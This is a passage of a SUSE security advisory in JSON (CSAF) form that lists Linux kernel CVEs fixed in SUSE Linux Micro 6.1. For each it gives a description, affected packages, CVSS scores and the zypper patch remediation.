"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53792",
"url": "https://www.suse.com/security/cve/CVE-2023-53792"
},
{
"category": "external",
"summary": "SUSE Bug 1254743 for CVE-2023-53792",
"url": "https://bugzilla.suse.com/1254743"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53792"
},
{
"cve": "CVE-2023-53793",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53793"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf tool x86: Fix perf_env memory leak\n\nFound by leak sanitizer:\n```\n==1632594==ERROR: LeakSanitizer: detected memory leaks\n\nDirect leak of 21 byte(s) in 1 object(s) allocated from:\n #0 0x7f2953a7077b in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cpp:439\n #1 0x556701d6fbbf in perf_env__read_cpuid util/env.c:369\n #2 0x556701d70589 in perf_env__cpuid util/env.c:465\n #3 0x55670204bba2 in x86__is_amd_cpu arch/x86/util/env.c:14\n #4 0x5567020487a2 in arch__post_evsel_config arch/x86/util/evsel.c:83\n #5 0x556701d8f78b in evsel__config util/evsel.c:1366\n #6 0x556701ef5872 in evlist__config util/record.c:108\n #7 0x556701cd6bcd in test__PERF_RECORD tests/perf-record.c:112\n #8 0x556701cacd07 in run_test tests/builtin-test.c:236\n #9 0x556701cacfac in test_and_print tests/builtin-test.c:265\n #10 0x556701cadddb in __cmd_test tests/builtin-test.c:402\n #11 0x556701caf2aa in cmd_test tests/builtin-test.c:559\n #12 0x556701d3b557 in run_builtin tools/perf/perf.c:323\n #13 0x556701d3bac8 in handle_internal_command tools/perf/perf.c:377\n #14 0x556701d3be90 in run_argv tools/perf/perf.c:421\n #15 0x556701d3c3f8 in main tools/perf/perf.c:537\n #16 0x7f2952a46189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n\nSUMMARY: AddressSanitizer: 21 byte(s) leaked in 1 allocation(s).\n```",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53793",
"url": "https://www.suse.com/security/cve/CVE-2023-53793"
},
{
"category": "external",
"summary": "SUSE Bug 1254739 for CVE-2023-53793",
"url": "https://bugzilla.suse.com/1254739"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53793"
},
{
"cve": "CVE-2023-53794",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53794"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix session state check in reconnect to avoid use-after-free issue\n\nDon\u0027t collect exiting session in smb2_reconnect_server(), because it\nwill be released soon.\n\nNote that the exiting session will stay in server-\u003esmb_ses_list until\nit complete the cifs_free_ipc() and logoff() and then delete itself\nfrom the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53794",
"url": "https://www.suse.com/security/cve/CVE-2023-53794"
},
{
"category": "external",
"summary": "SUSE Bug 1255163 for CVE-2023-53794",
"url": "https://bugzilla.suse.com/1255163"
},
{
"category": "external",
"summary": "SUSE Bug 1255235 for CVE-2023-53794",
"url": "https://bugzilla.suse.com/1255235"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2023-53794"
},
{
"cve": "CVE-2023-53795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: IOMMUFD_DESTROY should not increase the refcount\n\nsyzkaller found a race where IOMMUFD_DESTROY increments the refcount:\n\n obj = iommufd_get_object(ucmd-\u003eictx, cmd-\u003eid, IOMMUFD_OBJ_ANY);\n if (IS_ERR(obj))\n return PTR_ERR(obj);\n iommufd_ref_to_users(obj);\n /* See iommufd_ref_to_users() */\n if (!iommufd_object_destroy_user(ucmd-\u003eictx, obj))\n\nAs part of the sequence to join the two existing primitives together.\n\nAllowing the refcount the be elevated without holding the destroy_rwsem\nviolates the assumption that all temporary refcount elevations are\nprotected by destroy_rwsem. Racing IOMMUFD_DESTROY with\niommufd_object_destroy_user() will cause spurious failures:\n\n WARNING: CPU: 0 PID: 3076 at drivers/iommu/iommufd/device.c:477 iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:478\n Modules linked in:\n CPU: 0 PID: 3076 Comm: syz-executor.0 Not tainted 6.3.0-rc1-syzkaller #0\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023\n RIP: 0010:iommufd_access_destroy+0x18/0x20 drivers/iommu/iommufd/device.c:477\n Code: e8 3d 4e 00 00 84 c0 74 01 c3 0f 0b c3 0f 1f 44 00 00 f3 0f 1e fa 48 89 fe 48 8b bf a8 00 00 00 e8 1d 4e 00 00 84 c0 74 01 c3 \u003c0f\u003e 0b c3 0f 1f 44 00 00 41 57 41 56 41 55 4c 8d ae d0 00 00 00 41\n RSP: 0018:ffffc90003067e08 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888109ea0300 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: 0000000000000000 RDI: 00000000ffffffff\n RBP: 0000000000000004 R08: 0000000000000000 R09: ffff88810bbb3500\n R10: ffff88810bbb3e48 R11: 0000000000000000 R12: ffffc90003067e88\n R13: ffffc90003067ea8 R14: ffff888101249800 R15: 00000000fffffffe\n FS: 00007ff7254fe6c0(0000) GS:ffff888237c00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000555557262da8 CR3: 000000010a6fd000 CR4: 0000000000350ef0\n Call Trace:\n \u003cTASK\u003e\n iommufd_test_create_access drivers/iommu/iommufd/selftest.c:596 [inline]\n iommufd_test+0x71c/0xcf0 drivers/iommu/iommufd/selftest.c:813\n iommufd_fops_ioctl+0x10f/0x1b0 drivers/iommu/iommufd/main.c:337\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl fs/ioctl.c:856 [inline]\n __x64_sys_ioctl+0x84/0xc0 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x38/0x80 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe solution is to not increment the refcount on the IOMMUFD_DESTROY path\nat all. Instead use the xa_lock to serialize everything. The refcount\ncheck == 1 and xa_erase can be done under a single critical region. This\navoids the need for any refcount incrementing.\n\nIt has the downside that if userspace races destroy with other operations\nit will get an EBUSY instead of waiting, but this is kind of racing is\nalready dangerous.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53795",
"url": "https://www.suse.com/security/cve/CVE-2023-53795"
},
{
"category": "external",
"summary": "SUSE Bug 1254737 for CVE-2023-53795",
"url": "https://bugzilla.suse.com/1254737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53795"
},
{
"cve": "CVE-2023-53797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: wacom: Use ktime_t rather than int when dealing with timestamps\n\nCode which interacts with timestamps needs to use the ktime_t type\nreturned by functions like ktime_get. The int type does not offer\nenough space to store these values, and attempting to use it is a\nrecipe for problems. In this particular case, overflows would occur\nwhen calculating/storing timestamps leading to incorrect values being\nreported to userspace. In some cases these bad timestamps cause input\nhandling in userspace to appear hung.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53797",
"url": "https://www.suse.com/security/cve/CVE-2023-53797"
},
{
"category": "external",
"summary": "SUSE Bug 1254733 for CVE-2023-53797",
"url": "https://bugzilla.suse.com/1254733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
